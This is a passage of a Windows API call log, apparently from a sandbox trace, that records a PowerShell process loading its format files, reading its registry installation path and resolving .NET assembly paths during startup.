	[0763.157] ReadFile (in: hFile=0x320, lpBuffer=0x33e5e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x33e5e08*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0763.158] ReadFile (in: hFile=0x320, lpBuffer=0x33e5e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x33e5e08*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0763.160] ReadFile (in: hFile=0x320, lpBuffer=0x33e5e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x33e5e08*, lpNumberOfBytesRead=0x1cd458*=0xfb2, lpOverlapped=0x0) returned 1
	[0763.160] ReadFile (in: hFile=0x320, lpBuffer=0x33e5522, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x33e5522*, lpNumberOfBytesRead=0x1cd458*=0x0, lpOverlapped=0x0) returned 1
	[0763.160] ReadFile (in: hFile=0x320, lpBuffer=0x33e5e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x33e5e08*, lpNumberOfBytesRead=0x1cd458*=0x0, lpOverlapped=0x0) returned 1
	[0763.160] CloseHandle (hObject=0x320) returned 1
	[0763.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0763.160] SetErrorMode (uMode=0x1) returned 0x1
	[0763.160] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd400 | out: lpFileInformation=0x1cd400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0763.161] SetErrorMode (uMode=0x1) returned 0x1
	[0763.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0763.161] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd4e8 | out: phkResult=0x1cd4e8*=0x320) returned 0x0
	[0763.161] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd46c, lpData=0x0, lpcbData=0x1cd468*=0x0 | out: lpType=0x1cd46c*=0x1, lpData=0x0, lpcbData=0x1cd468*=0x56) returned 0x0
	[0763.161] CoTaskMemAlloc (cb=0x5a) returned 0x288e990
	[0763.161] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd43c, lpData=0x288e990, lpcbData=0x1cd438*=0x56 | out: lpType=0x1cd43c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd438*=0x56) returned 0x0
	[0763.161] CoTaskMemFree (pv=0x288e990) 
	[0763.161] RegCloseKey (hKey=0x320) returned 0x0
	[0763.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0763.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0763.169] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0xd35ae598, Data2=0xea34, Data3=0x4aea, Data4=([0]=0x9c, [1]=0x1a, [2]=0xf2, [3]=0xfb, [4]=0x3b, [5]=0xd8, [6]=0xd2, [7]=0xfb))) returned 0x0
	[0763.174] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0xc713ddc7, Data2=0x8f49, Data3=0x425c, Data4=([0]=0xb9, [1]=0xfc, [2]=0x6d, [3]=0xc5, [4]=0x4f, [5]=0x34, [6]=0xce, [7]=0xcb))) returned 0x0
	[0763.174] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0xb2ddcf31, Data2=0xb2ad, Data3=0x4282, Data4=([0]=0xb3, [1]=0x79, [2]=0xcf, [3]=0xed, [4]=0x10, [5]=0x52, [6]=0x6a, [7]=0x8e))) returned 0x0
	[0763.175] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x4dc59734, Data2=0x8a0c, Data3=0x4084, Data4=([0]=0x9d, [1]=0xbe, [2]=0xbe, [3]=0xdf, [4]=0x1b, [5]=0xf0, [6]=0x78, [7]=0x91))) returned 0x0
	[0763.175] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x8184882f, Data2=0x3207, Data3=0x4dc5, Data4=([0]=0xb8, [1]=0xfe, [2]=0xb4, [3]=0x76, [4]=0x66, [5]=0xd0, [6]=0x66, [7]=0x58))) returned 0x0
	[0763.175] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0xc7cbc2ca, Data2=0xe8ac, Data3=0x4514, Data4=([0]=0x99, [1]=0x42, [2]=0x20, [3]=0x71, [4]=0x65, [5]=0x5c, [6]=0x6c, [7]=0x90))) returned 0x0
	[0763.175] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x318
	[0763.175] GetFileType (hFile=0x318) returned 0x1
	[0763.175] SetErrorMode (uMode=0x1) returned 0x1
	[0763.175] GetFileType (hFile=0x318) returned 0x1
	[0763.176] ReadFile (in: hFile=0x318, lpBuffer=0x328e8e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x328e8e8*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0763.176] ReadFile (in: hFile=0x318, lpBuffer=0x328e8e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x328e8e8*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0763.177] ReadFile (in: hFile=0x318, lpBuffer=0x328e8e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x328e8e8*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0763.177] ReadFile (in: hFile=0x318, lpBuffer=0x328e8e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x328e8e8*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0763.177] ReadFile (in: hFile=0x318, lpBuffer=0x328e8e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x328e8e8*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0763.177] ReadFile (in: hFile=0x318, lpBuffer=0x328e8e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x328e8e8*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0763.177] ReadFile (in: hFile=0x318, lpBuffer=0x328e8e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x328e8e8*, lpNumberOfBytesRead=0x1cd458*=0xaca, lpOverlapped=0x0) returned 1
	[0763.178] ReadFile (in: hFile=0x318, lpBuffer=0x328df1a, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x328df1a*, lpNumberOfBytesRead=0x1cd458*=0x0, lpOverlapped=0x0) returned 1
	[0763.178] ReadFile (in: hFile=0x318, lpBuffer=0x328e8e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x328e8e8*, lpNumberOfBytesRead=0x1cd458*=0x0, lpOverlapped=0x0) returned 1
	[0763.178] CloseHandle (hObject=0x318) returned 1
	[0763.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0763.178] SetErrorMode (uMode=0x1) returned 0x1
	[0763.178] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd400 | out: lpFileInformation=0x1cd400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0763.179] SetErrorMode (uMode=0x1) returned 0x1
	[0763.179] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0763.179] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd4e8 | out: phkResult=0x1cd4e8*=0x318) returned 0x0
	[0763.179] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd46c, lpData=0x0, lpcbData=0x1cd468*=0x0 | out: lpType=0x1cd46c*=0x1, lpData=0x0, lpcbData=0x1cd468*=0x56) returned 0x0
	[0763.179] CoTaskMemAlloc (cb=0x5a) returned 0x3e8760
	[0763.179] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd43c, lpData=0x3e8760, lpcbData=0x1cd438*=0x56 | out: lpType=0x1cd43c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd438*=0x56) returned 0x0
	[0763.179] CoTaskMemFree (pv=0x3e8760) 
	[0763.179] RegCloseKey (hKey=0x318) returned 0x0
	[0763.179] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0763.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0763.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x1cc970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0763.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cc970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0763.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x1cc970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0764.394] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0764.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1cc970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0764.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x1cc970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0764.405] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x1cc970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0764.406] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1cc970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0764.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x1cc970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0764.410] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1cc970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0764.411] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1cc970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0764.413] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1cc970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0764.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x1cc970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0764.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x1cc970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0765.532] VirtualQuery (in: lpAddress=0x1cbf80, lpBuffer=0x1cce40, dwLength=0x30 | out: lpBuffer=0x1cce40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0765.533] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x4476163c, Data2=0x36c, Data3=0x46f7, Data4=([0]=0x97, [1]=0xe, [2]=0xb0, [3]=0xad, [4]=0xf7, [5]=0x82, [6]=0x5e, [7]=0x2d))) returned 0x0
	[0765.534] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x99a2e287, Data2=0x221, Data3=0x484f, Data4=([0]=0xb1, [1]=0xe2, [2]=0x8c, [3]=0x33, [4]=0xcc, [5]=0xd7, [6]=0x98, [7]=0x31))) returned 0x0
	[0765.534] VirtualQuery (in: lpAddress=0x1cc130, lpBuffer=0x1ccff0, dwLength=0x30 | out: lpBuffer=0x1ccff0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0765.535] VirtualQuery (in: lpAddress=0x1cc130, lpBuffer=0x1ccff0, dwLength=0x30 | out: lpBuffer=0x1ccff0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0765.536] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x6862da18, Data2=0xba3e, Data3=0x4989, Data4=([0]=0xb1, [1]=0x79, [2]=0x40, [3]=0xe7, [4]=0x24, [5]=0x8b, [6]=0xe7, [7]=0xd0))) returned 0x0
	[0765.539] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x2cbee4fe, Data2=0x29c8, Data3=0x4b5c, Data4=([0]=0xa7, [1]=0xff, [2]=0x3d, [3]=0xc0, [4]=0x22, [5]=0xaa, [6]=0x4e, [7]=0xdc))) returned 0x0
	[0765.539] VirtualQuery (in: lpAddress=0x1cc380, lpBuffer=0x1cd240, dwLength=0x30 | out: lpBuffer=0x1cd240*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0765.540] VirtualQuery (in: lpAddress=0x1cc0c0, lpBuffer=0x1ccf80, dwLength=0x30 | out: lpBuffer=0x1ccf80*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0765.541] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x60db7938, Data2=0xaf14, Data3=0x4d8e, Data4=([0]=0x87, [1]=0x87, [2]=0xf0, [3]=0xda, [4]=0x6d, [5]=0xd9, [6]=0xfb, [7]=0xd0))) returned 0x0
	[0765.541] VirtualQuery (in: lpAddress=0x1cb9f0, lpBuffer=0x1cc8b0, dwLength=0x30 | out: lpBuffer=0x1cc8b0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0765.541] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0x8fddf092, Data2=0x462f, Data3=0x431e, Data4=([0]=0xb3, [1]=0x56, [2]=0x34, [3]=0xe7, [4]=0x1c, [5]=0x22, [6]=0xac, [7]=0x99))) returned 0x0
	[0765.541] CoCreateGuid (in: pguid=0x1cd710 | out: pguid=0x1cd710*(Data1=0xcb95bf5, Data2=0xdde, Data3=0x4415, Data4=([0]=0xa7, [1]=0xcd, [2]=0xdb, [3]=0xe0, [4]=0xfe, [5]=0xaa, [6]=0x1b, [7]=0xa7))) returned 0x0
	[0765.541] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x318
	[0765.542] GetFileType (hFile=0x318) returned 0x1
	[0765.542] SetErrorMode (uMode=0x1) returned 0x1
	[0765.542] GetFileType (hFile=0x318) returned 0x1
	[0765.542] ReadFile (in: hFile=0x318, lpBuffer=0x3340ee0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x3340ee0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0765.543] ReadFile (in: hFile=0x318, lpBuffer=0x3340ee0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x3340ee0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0765.543] ReadFile (in: hFile=0x318, lpBuffer=0x3340ee0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x3340ee0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0765.544] ReadFile (in: hFile=0x318, lpBuffer=0x3340ee0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x3340ee0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0765.544] ReadFile (in: hFile=0x318, lpBuffer=0x3340ee0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x3340ee0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0765.544] ReadFile (in: hFile=0x318, lpBuffer=0x3340ee0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x3340ee0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0765.544] ReadFile (in: hFile=0x318, lpBuffer=0x3340ee0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x3340ee0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0765.544] ReadFile (in: hFile=0x318, lpBuffer=0x3340ee0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x3340ee0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0765.546] ReadFile (in: hFile=0x318, lpBuffer=0x3340ee0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x3340ee0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0765.547] ReadFile (in: hFile=0x318, lpBuffer=0x3340ee0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x3340ee0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0765.547] ReadFile (in: hFile=0x318, lpBuffer=0x3340ee0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x3340ee0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0765.548] ReadFile (in: hFile=0x318, lpBuffer=0x3340ee0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x3340ee0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0765.548] ReadFile (in: hFile=0x318, lpBuffer=0x3340ee0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x3340ee0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0765.548] ReadFile (in: hFile=0x318, lpBuffer=0x3340ee0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x3340ee0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0765.549] ReadFile (in: hFile=0x318, lpBuffer=0x3340ee0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x3340ee0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0765.549] ReadFile (in: hFile=0x318, lpBuffer=0x3340ee0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x3340ee0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
	[0765.552] ReadFile (in: hFile=0x318, lpBuffer=0x3340ee0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd458, lpOverlapped=0x0 | out: lpBuffer=0x3340ee0*, lpNumberOfBytesRead=0x1cd458*=0x1000, lpOverlapped=0x0) returned 1
